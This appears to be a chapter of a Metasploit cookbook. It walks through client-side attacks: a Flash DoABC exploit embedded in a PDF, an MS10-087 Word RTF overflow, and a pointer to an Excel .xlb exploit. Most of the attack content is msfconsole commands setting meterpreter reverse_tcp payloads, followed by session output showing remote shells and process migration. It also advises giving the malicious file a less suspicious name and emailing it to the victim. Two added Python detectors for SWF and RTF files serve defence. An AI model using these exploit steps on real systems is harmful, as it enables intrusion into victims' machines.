This module exploits a vulnerability in the DoABC tag handling within Versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that embed Flash Player. Arbitrary code execution is gained by embedding a specially designed Flash movie into a PDF document. An AcroJS heap spray is often used to ensure that the memory referenced through the invalid pointer is under the attacker's control. This recipe shows how a target machine can be compromised by exploiting this Flash Player vulnerability.
This module uses a DEP bypass method similar to the one in the adobe_libtiff module. Because the syscall number is hardcoded, this method is unlikely to work across different Windows versions.
Getting ready
For this recipe, we are using Windows XP SP3 as the target machine and BackTrack 5 R3 as the attacker machine. To start with, simply launch msfconsole; it will show you the following prompt:
msf>
How to do it...
In this recipe, a specially crafted .swf file is embedded into the .pdf file. Now, our next aim is to make the victim open that file. Let us see how to do this:
msf > use exploit/windows/fileformat/adobe_flashplayer_newfunction
msf exploit(adobe_flashplayer_newfunction) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_flashplayer_newfunction) > set SRVHOST 192.168.1.101
SRVHOST => 192.168.1.101
msf exploit(adobe_flashplayer_newfunction) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(adobe_flashplayer_newfunction) > exploit
[*] Exploit running as background job.
[*] Server started.
msf exploit(adobe_flashplayer_newfunction) >
[*] Sending crafted PDF */SWF to 192.168.1.100:1039
[*] Sending stage (748032 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:1040)
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.101:1040) processing InitialAutoRunScript 'migrate -f'
[*] Current server process : firefox.exe (3644)
[*] Spawning a notepad.exe host process
[*] Migrating into process ID 3900
[*] New server process: notepad.exe (3900)
msf exploit(adobe_flashplayer_newfunction) > sessions -l

Active sessions
===============

  Id  Type         Information     Connection
  --  ----         -----------     ----------
  1   meterpreter  ERIC-FD2123B3C  192.168.1.100:1040

msf exploit(adobe_flashplayer_newfunction) > sessions -i 1
meterpreter >
How it works...
The module serves a PDF whose embedded SWF data triggers the new-function memory corruption in the DoABC tag handling of vulnerable Adobe Flash Player versions, which can lead to the execution of code supplied by a remote attacker. By persuading a victim to open the specially crafted PDF document, a remote attacker can corrupt memory and execute arbitrary code on the system with elevated privileges.
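As an added defender-side example (not part of the original recipe or of the Metasploit module), the following Python walks the tag list of an SWF file and reports whether it carries DoABC tags, the tag whose handling is vulnerable here; an analyst would run it over SWF objects already extracted from a suspicious PDF (extraction is assumed to happen elsewhere). The sample movies are constructed inline with a placeholder DoABC payload, not real bytecode.

```python
import struct
import zlib

DOABC = 82  # SWF tag code for DoABC, the tag that carries ActionScript 3 bytecode


def swf_tag_codes(data: bytes) -> list:
    """Tag codes of an SWF in order (empty if not FWS/CWS; LZMA ZWS unsupported)."""
    if len(data) < 8 or data[:3] not in (b"FWS", b"CWS"):
        return []
    body = data[8:]  # skip signature (3), version (1), file length (4)
    if data[:3] == b"CWS":
        body = zlib.decompress(body)
    # Frame RECT is a bit field: 5 bits of Nbits, then four Nbits-wide values.
    nbits = body[0] >> 3
    pos = (5 + 4 * nbits + 7) // 8 + 4  # RECT, frame rate (2), frame count (2)
    codes = []
    while pos + 2 <= len(body):
        header = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = header >> 6, header & 0x3F
        if length == 0x3F:  # long form: explicit 32-bit length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        codes.append(code)
        if code == 0:  # End tag terminates the tag list
            break
        pos += length
    return codes


def has_doabc(data: bytes) -> bool:
    """True if the SWF carries at least one DoABC (AS3 bytecode) tag."""
    return DOABC in swf_tag_codes(data)


def build_swf(tags, compress=False) -> bytes:
    """Constructed test input: a minimal SWF from (code, payload) tags."""
    rect = bytes.fromhex("7800055f00000fa000")  # Nbits=15, 550x400 px in twips
    body = rect + struct.pack("<HH", 0x1800, 1)  # frame rate 24.0, one frame
    for code, payload in tags:
        if len(payload) < 0x3F:
            body += struct.pack("<H", (code << 6) | len(payload)) + payload
        else:
            body += struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    body += struct.pack("<H", 0)  # End tag
    file_len = 8 + len(body)  # header field holds the uncompressed length
    if compress:
        body = zlib.compress(body)
    return (b"CWS" if compress else b"FWS") + b"\x0a" + struct.pack("<I", file_len) + body
```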
Understanding Microsoft Word RTF stack buffer overflow
Now, in this recipe, we will focus on another popular Windows tool, Microsoft Office. The RTF buffer overflow flaw exists in both the 2010 and 2007 versions of the Office software pack.
This vulnerability exists in the handling of the pfragments shape property within the Microsoft Word RTF parser. Let us understand this exploit in detail. I am assuming that we have already gathered information about our target and know that the Office pack is installed on their system.
Getting ready
We will start by launching the msfconsole interface. The exploit we will be using in this recipe can be located at exploit/windows/fileformat/ms10_087_rtf_pfragments_bof. The payload we will be using is windows/meterpreter/reverse_tcp to get shell connectivity with the target machine.
How to do it...
The working process will again be similar to what we have seen so far in previous recipes. We will first set our exploit. Then, we will select a payload and pass the relevant parameters for both in order to execute the exploit successfully. Let us perform these steps:
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_087_rtf_pfragments_bof) > show options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh..
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
The exploit contains a parameter, FILENAME, which contains information about the malicious filename to be created. The default value is msf.rtf. Let us change it to some less suspicious name. We will also set the value for LHOST, which is the attacking machine's IP address:
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME priceinfo.rtf
FILENAME => priceinfo.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.56.101
The filename has been changed to priceinfo.rtf and the value of LHOST has been set to 192.168.56.101. So, we are all set to execute the exploit module now:
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'priceinfo.rtf' file ...
[+] priceinfo.rtf stored at /root/.msf4/local/priceinfo.rtf
Metasploit has created a malicious file for us, which we will have to use in order to proceed with the client-side attack. The file is located at /root/.msf4/local/priceinfo.rtf. The next step is to send this file to the target user by email or some other medium. Once the target user opens this malicious file, it opens as a Word document. After a few seconds, the Microsoft Word instance will either hang or crash, depending on the system. In the meantime, the malicious file has already executed the exploit and provided an active session with the target. To make the connection persistent, the exploit migrates itself into another process that runs in the background:
[*] Sending stage (752128 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:57031) at 2011-11-13 23:16:20 +0530
[*] Session ID 2 (192.168.56.101:4444 -> 192.168.56.1:57031) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: WINWORD.EXE (5820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 5556
[+] Successfully migrated to process
The first few lines of the console output show a successful execution of the exploit, which results in an active session with session ID 2. The last part shows that the exploit has successfully migrated from WINWORD.EXE to notepad.exe.
How it works...
The exploit module simply creates a malicious Word file that passes illegal values to the Word RTF parser. The parser's failure to reject these illegal values leads to a buffer overflow. Then the payload comes into action and executes the code that sets up a back connection to the attacking machine. The success of this attack varies from machine to machine, as there can be situations where Windows ASLR (Address Space Layout Randomization) prevents execution of arbitrary code (the payload).
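As an added defender-side example (not part of the original recipe or of the Metasploit module), this Python triages an RTF attachment for the pFragments shape property that the vulnerable Word parser mishandles, reporting how many such properties it carries and how long their values are. The sample documents are constructed inline and are not exploit files; the rule that any pFragments property is suspicious, and the 64-character value threshold, are assumptions of this example.

```python
import re

# An RTF document starts with {\rtf1 ...}.
RTF_MAGIC = re.compile(rb"^\s*\{\\rtf1", re.IGNORECASE)
# Shape property block {\sp{\sn pFragments}{\sv <value>}}: the value of this
# property is what the vulnerable Word RTF parser mishandles (MS10-087).
PFRAGMENTS = re.compile(rb"\{\\sn\s*pFragments\s*\}\s*\{\\sv\s*([^}]*)\}", re.IGNORECASE)
SHAPE = re.compile(rb"\\shp\b")  # counts \shp groups, not \shpinst


def triage_rtf(data: bytes, max_sv_len: int = 64) -> dict:
    """Static triage of an RTF file for the pFragments shape property.

    Heuristic (assumption of this example): ordinary documents practically
    never carry a pFragments property, so any occurrence is flagged, and a
    value longer than max_sv_len characters is additionally flagged as oversized.
    """
    is_rtf = bool(RTF_MAGIC.match(data))
    values = PFRAGMENTS.findall(data) if is_rtf else []
    longest = max((len(v.strip()) for v in values), default=0)
    return {
        "is_rtf": is_rtf,
        "shapes": len(SHAPE.findall(data)) if is_rtf else 0,
        "pfragments": len(values),
        "longest_sv": longest,
        "suspicious": bool(values),
        "oversized_sv": longest > max_sv_len,
    }


# Constructed samples (not exploit files): a plain document and one carrying
# a pFragments property whose value is a long run of filler characters.
CLEAN_RTF = rb"{\rtf1\ansi\deff0 {\fonttbl{\f0 Arial;}} Quarterly price list.\par}"
SUSPICIOUS_RTF = (
    rb"{\rtf1\ansi{\shp{\*\shpinst{\sp{\sn pFragments}{\sv "
    + b"0" * 200
    + rb"}}}}Quarterly price list.\par}"
)
```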
There's more...
There is another popular exploit available for the Office suite. I will leave it as a lesson for you to try. Here, I will give a brief overview about it.
Microsoft Excel 2007 buffer overflow
This known exploit targets Microsoft Excel 2007 through its .xlb file format. Opening a malicious .xlb file can lead to a stack-based buffer overflow and arbitrary code execution.
The exploit can be located at exploit/windows/fileformat/ms11_021_xlb_bof.